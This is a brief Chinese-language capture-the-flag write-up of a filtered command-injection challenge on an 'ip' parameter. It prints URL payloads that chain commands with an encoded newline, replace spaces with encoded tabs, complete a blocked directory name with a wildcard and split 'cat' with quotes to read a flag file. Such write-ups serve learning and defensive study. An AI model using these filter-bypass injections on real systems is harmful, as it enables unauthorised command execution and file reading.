综合过滤练习
这道题试了好多种方法,最后才发现需要在url里面改才可以,也是参考了大佬的链接
我是大佬链接
这道题能过滤的基本都过滤了,我们第一步应该想办法查看当前文件夹的内容,这里常用的管道符都不能用,只能用换行符的url编码 %0a,并且去要在url中修改:
?ip=127.0.0.1%0als#
看到了回显就看到了希望,接下来要进入到flag这个文件夹中来查看该文件夹的内容,这里flag被过滤了,又学到了一个新的知识点TAB的url编码,我们用这个把文件夹的名字补全:
?ip=127.0.0.1%0als%09*is_here#
接下来就是查看这个文件中的flag了,又又有新知识,因为cat被过滤了,我们可以使用单引号的url编码%27将cat的任意字母包裹:
?ip=127.0.0.1%0acd%09*is_here%0ac%27a%27t%09*_9436863016875.php#
最后一步就是查看网页源代码得到flag:
注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正